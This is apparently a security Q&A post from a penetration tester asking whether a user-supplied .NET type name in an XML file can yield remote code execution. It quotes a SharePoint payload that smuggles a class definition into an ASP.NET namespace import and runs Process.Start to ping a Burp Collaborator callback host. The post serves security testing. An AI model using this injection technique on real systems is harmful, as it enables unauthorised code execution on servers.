# RCE through specifying .NET type or namespace?

Tags: .net, remote-code-execution

I'm testing an application that allows the user to provide an XML file that will be processed. (I've already tried typical XML attacks, such as XXE.) One of the elements of the XML file allows the user to specify a .NET type that will loaded by the application, by fully-qualified type name.

I cannot import new assemblies into the application, so I cannot make my own malicious type. Is there a way to dynamically create a type within the fully-qualified type name declaration?

I would not think this is possible except that, while researching this question, I found what might be an example of what I'm looking for. In an [article](https://www.mdsec.co.uk/2020/03/a-security-review-of-sharepoint-site-pages/) about a completely different application (SharePoint) there was a way to get RCE with code like this:

```
<%@ Page language="C#" classname="mytest_irsdl" %> 
<%@ import Namespace='System.Net;public/**/class/**/mytest_irsdl:global::System.Web.UI.Page,System.Web.SessionState.IRequiresSessionState,System.Web.IHttpHandler{public/**/static/**/object/**/@__stringResource;public/**/static/**/object/**/@__fileDependencies;public/**/static/**/bool/**/__initialized=false;object/**/test2=System.Diagnostics.Process.Start("ping","itsover.g9qrlom4l1slw29pf07k3xtoyf47sw.burpcollaborator.net");}}namespace/**/foo{using/**/System.Linq;using/**/System.Web.Security;using/**/System.Collections.Generic;using/**/System.Text.RegularExpressions;using/**/System.Web.UI.WebControls;using/**/System.Xml.Linq;using/**/System.Web.UI;using/**/System;using/**/System.Web.UI.HtmlControls;using/**/System.Web;using/**/System.Configuration;using/**/System.ComponentModel.DataAnnotations;using/**/System.Text;using/**/System.Web.Profile;using/**/System.Web.Caching;using/**/System.Collections;using/**/System.Web.UI.WebControls.WebParts;using/**/System.Web.UI.WebControls.Expressions;using/**/System.Collections.Specialized;using/**/System.Web.SessionState;using/**/System.Web.DynamicData;//' %>
```

This is an example of importing a malicious .NET namespace dynamically, and I'm looking to do the same with a type.